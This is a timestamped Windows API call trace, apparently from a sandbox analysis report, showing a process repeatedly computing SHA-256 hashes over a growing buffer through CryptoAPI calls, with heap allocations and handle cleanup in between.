	[0208.618] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.618] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1c68
	[0208.618] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1c68, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1c68, pdwDataLen=0x129364) returned 1
	[0208.618] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.618] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.618] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.619] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.619] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0208.619] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.619] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1c90
	[0208.619] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1c90, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1c90, pdwDataLen=0x129364) returned 1
	[0208.619] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.619] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.619] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.620] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.620] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0208.620] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.620] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1cb8
	[0208.620] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1cb8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1cb8, pdwDataLen=0x129364) returned 1
	[0208.620] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.620] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.620] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.620] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.620] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0208.620] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.620] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1ce0
	[0208.620] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1ce0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1ce0, pdwDataLen=0x129364) returned 1
	[0208.620] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.620] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.621] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.621] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.621] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0208.621] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.621] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1d08
	[0208.621] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1d08, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1d08, pdwDataLen=0x129364) returned 1
	[0208.621] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.621] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.621] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.621] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.621] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0208.622] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.622] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1d30
	[0208.622] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1d30, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1d30, pdwDataLen=0x129364) returned 1
	[0208.622] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.622] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.622] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.622] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.622] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0208.622] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.622] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1d58
	[0208.622] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1d58, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1d58, pdwDataLen=0x129364) returned 1
	[0208.622] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.622] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.622] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.622] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.622] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0208.623] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.623] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1d80
	[0208.623] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1d80, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1d80, pdwDataLen=0x129364) returned 1
	[0208.623] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.623] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.623] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.623] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.623] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0208.623] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.623] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1da8
	[0208.623] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1da8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1da8, pdwDataLen=0x129364) returned 1
	[0208.623] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.623] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.623] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.623] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.623] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0208.624] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.624] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1dd0
	[0208.624] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1dd0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1dd0, pdwDataLen=0x129364) returned 1
	[0208.624] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.624] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.624] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.624] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.624] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0208.624] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.624] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1df8
	[0208.624] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1df8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1df8, pdwDataLen=0x129364) returned 1
	[0208.624] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.624] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.624] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.624] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.624] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0208.625] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.625] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1e20
	[0208.625] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1e20, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1e20, pdwDataLen=0x129364) returned 1
	[0208.625] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.625] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.625] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.625] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.625] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0208.625] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.625] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1e48
	[0208.625] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1e48, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1e48, pdwDataLen=0x129364) returned 1
	[0208.625] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.625] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.625] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.625] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.625] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0208.626] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.626] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1e70
	[0208.626] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1e70, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1e70, pdwDataLen=0x129364) returned 1
	[0208.626] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.626] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.626] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.626] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.626] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0208.626] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.626] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1e98
	[0208.626] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1e98, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1e98, pdwDataLen=0x129364) returned 1
	[0208.626] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.626] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.626] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.626] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.626] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0208.627] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.627] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1ec0
	[0208.627] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1ec0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1ec0, pdwDataLen=0x129364) returned 1
	[0208.627] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.627] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.627] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.627] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.627] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0208.627] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.627] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1ee8
	[0208.627] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1ee8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1ee8, pdwDataLen=0x129364) returned 1
	[0208.627] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.627] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.627] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.627] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.627] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0208.628] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.628] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1f10
	[0208.628] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1f10, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1f10, pdwDataLen=0x129364) returned 1
	[0208.628] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.628] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.628] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.628] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.628] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0208.628] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.628] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1f38
	[0208.628] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1f38, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1f38, pdwDataLen=0x129364) returned 1
	[0208.628] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.628] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.628] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.628] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.628] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0208.629] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.629] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1f60
	[0208.629] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1f60, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1f60, pdwDataLen=0x129364) returned 1
	[0208.629] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.629] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.629] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.629] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.629] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0208.629] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.629] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1f88
	[0208.629] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1f88, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1f88, pdwDataLen=0x129364) returned 1
	[0208.629] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.629] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.629] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.629] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.629] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0208.630] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.630] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1fb0
	[0208.630] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1fb0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1fb0, pdwDataLen=0x129364) returned 1
	[0208.630] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.630] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.630] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.630] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.630] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0208.630] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.630] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1fd8
	[0208.630] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1fd8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1fd8, pdwDataLen=0x129364) returned 1
	[0208.630] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.630] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.630] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.630] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.630] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0208.631] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.631] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b2000
	[0208.631] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b2000, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b2000, pdwDataLen=0x129364) returned 1
	[0208.631] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.631] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.631] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.631] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.631] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0208.631] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.631] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b2028
	[0208.631] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b2028, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b2028, pdwDataLen=0x129364) returned 1
	[0208.631] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.631] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.631] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.631] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.631] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0208.632] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.632] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b2050
